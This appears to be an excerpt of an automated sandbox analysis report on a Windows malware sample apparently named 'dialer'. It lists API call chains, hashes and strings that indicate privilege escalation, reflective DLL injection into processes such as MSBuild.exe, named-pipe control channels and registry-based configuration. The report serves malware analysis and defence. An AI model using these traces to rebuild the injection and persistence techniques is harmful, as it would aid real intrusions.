                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 5a4cccb55fb742b62dc734b8e0df6b208cc7dbaed8a3dc776fd4d6eed8ebf3d7
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: B1012536600F90C6E708DB66A9041DAABA0F78CB81F084425FF5A43729DF39C0918B40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: 431a759050d179949e483925ef2424d29c30973842a17244e412dcbf38dff4d6
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: E591AE7271075496FB689F6594843ED2BA0F79CB88F14428AEF0E67A9DDB36C4D2C700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 2cd6e4e7066c78cd4db9facb4e75c84f206db304ab82898182781ebb652835db
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: CC111532710F058AEB408B60E8553E833A4F75D768F440E21FF6D86BA9DB79C5A89380
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: 7be1a33af68f3fa142c27885c3340da2d6443656d2c4f068d33aa84f63ab79a6
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 7B71B53620078195EB6DDF2598463EA67A4F38D784F440256FF0963B9DDE37C585C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: e7b6a842bf8d32be560e08983c46cfe544e9b3cf3ecfba2c55d2003a00bb49b2
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: D5614637A00F848AEB28DF69E4803DE77A0F748B88F154255EF8917B99DB3AD595C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 9c6cea4bdae0cb2a6801b25d976e615f5eec4524207763dd4bfc951a6191974f
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 6E51E472204781A1EA7CDB29A4993EA6791F3CD740F440265FF5A43B9EDA3FC9848780
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 410f1528c0f1169d0e8c37794e18f1a6940184ee8eabb10144613a5658bf0d8f
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 7C41AD72614B8086EB248F65E8443EAB7A0F79CB94F544121FF4E87798EB3EC591CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 575042b631b71269712c8c11cde695bc973bf8b3a77ab8acaf2560d46d2c1290
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 16112836214B8082EB658F25E44439AB7E5FB88B94F584264EF8C07B68DF3EC595CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: abf525fd3daf36b883674429ccc3a985a46788f7e6dc3d0c007950352127e432
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: B0E08671A41B4490EF058F61E8402D873A4EB5CB64B489222AE5C46359FA38D1E9C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 74fd576b2d3ba4bb534c5b975ecc9e34be97d807d594df3172c2d25d8146ed7d
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: A7E0E671A51B4494DF058F65D8501D873A5E75CB54B889262DE5C46359EA38D1E5C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bd8e8fd0d7fd396850ebe7402d0c179e7b2eb44d2eae185ed36ccf84efb2eafe
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: B2118C35601B8581EA48DB66A8092E977E1FB8DFC0F1840A8EF4D5776ADF3AC482C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 869105a1881b30f2dc14e196b85700cdad5a2b022a2c7915137ec73985f912f1
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 04E03939601B0486EB088B62D80838ABAE1EB8DB06F0880249F0907355DF7E84D9CB50

                                                                          Callgraph

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64

                                                                          Control-flow Graph

                                                                          [Control-flow graph of the function at 1400010c0-1400014d6 (rendered figure; node and edge list omitted, nodes marked Executed / Not Executed). Labelled calls in address order: call 1400018ac, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle, StrCmpIW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree, call 140001ec4, StrStrA, VirtualAllocEx, WriteProcessMemory, call 14000211c, WaitForSingleObject, GetExitCodeThread, FindCloseChangeNotification.]
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64

                                                                          Control-flow Graph

                                                                          [Control-flow graph of the function at 1400021d0-140002255 (rendered figure; node and edge list omitted, nodes marked Executed / Not Executed). Labelled calls in address order: call 140001b54, Sleep, ConnectNamedPipe, ReadFile, Sleep, DisconnectNamedPipe; the DisconnectNamedPipe block loops back to ConnectNamedPipe.]
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          [Control-flow graph of the function at 140002b38-140002bf4 (rendered figure; node and edge list omitted, nodes marked Executed / Not Executed). Labelled calls in address order: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, K32EnumProcesses, call 140002540, SleepEx; the SleepEx block loops back to K32EnumProcesses.]
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          [Control-flow graph of the function at 1400018ac-140001912 (rendered figure; node and edge list omitted, nodes marked Executed / Not Executed). Labelled calls in address order: OpenProcess, IsWow64Process, FindCloseChangeNotification.]
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                          • String ID:

                                                                          Control-flow Graph

                                                                          [Control-flow graph of the function at 140002258-140002263 (rendered figure; node and edge list omitted, nodes marked Executed / Not Executed). Labelled calls in address order: call 14000226c, ExitProcess.]
APIs
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
  • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
  • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
• ExitProcess.KERNEL32 ref: 0000000140002263
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
• String ID:
• API String ID: 2373407002-0
• Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
• Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
• Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
• Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

Control-flow Graph

control_flow_graph: function starting at 140002560 (rendered graph; node layout and edge list omitted)
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
• String ID: SOFTWARE$dialerstager$open
• API String ID: 4281403370-3931493855
• Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
• Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

Control-flow Graph

control_flow_graph: function starting at 140001c88 (rendered graph; node layout and edge list omitted)
Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
• String ID: @
• API String ID: 3462610200-2766056989
• Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
• Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

Control-flow Graph

Memory Dump Source
• Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID: dialersvc64
